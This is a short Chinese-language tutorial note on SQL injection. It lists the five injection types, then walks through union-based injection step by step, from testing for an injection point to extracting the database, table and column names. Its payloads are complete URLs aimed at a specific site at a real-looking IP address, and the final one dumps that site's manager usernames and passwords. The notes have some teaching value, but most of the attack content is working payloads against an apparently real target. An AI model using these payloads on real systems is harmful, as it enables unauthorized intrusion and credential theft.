sql原理
传入的参数拼接在数据库的查询语句中 导致一并进入到数据
sql注入有5种类型
Boolean-based blind SQL injection(布尔型注入)
Error-based SQL injection(报错型注入)
UNION query SQL injection(可联合查询注入)
Stacked queries SQL injection(可多语句查询注入)
Time-based blind SQL injection(基于时间延迟注入)
判断有无注入点
and 1=1
and 1=2
判断字段数
order by
判断库名
写一个不存在的id union select 字段数
http://xxx/php.id?1111111(不存在) union select 1,2,。。。。(字段数)
将存在库名的位置替换为 database() 得到库名
得到表名
http://111.230.203.135/index/article.php?type=sqgg&id=333330%20union%20select%201,2,group_concat(table_name),4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()
// 将库名位置替换为 group_concat(table_name) 末尾加 from information_schema.tables where table_schema =database()
得到列名
http://111.230.203.135/index/article.php?type=sqgg&id=333330%20union%20select%201,2,group_concat(column_name),4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x74625f7a6873715f696e6465785f6d616e61676572
// 将库名位置替换为group_concat(column_name) 末尾加from information_schema.columns where table_name=0x74625f7a6873715f696e6465785f6d616e61676572 (= 后面加 0x 加表名的16进制 )
查询数据库用户名及密码
http://111.230.203.135/index/article.php?type=sqgg&id=333330%20union%20select%201,2,group_concat(user_id,pass_word),4,5,6,7,8,9,10,11%20from%20tb_zhsq_index_manager
//将库名位置改为具体要查的数据列名 group_concat(user_id,pass_word) 莫问加上 from 表名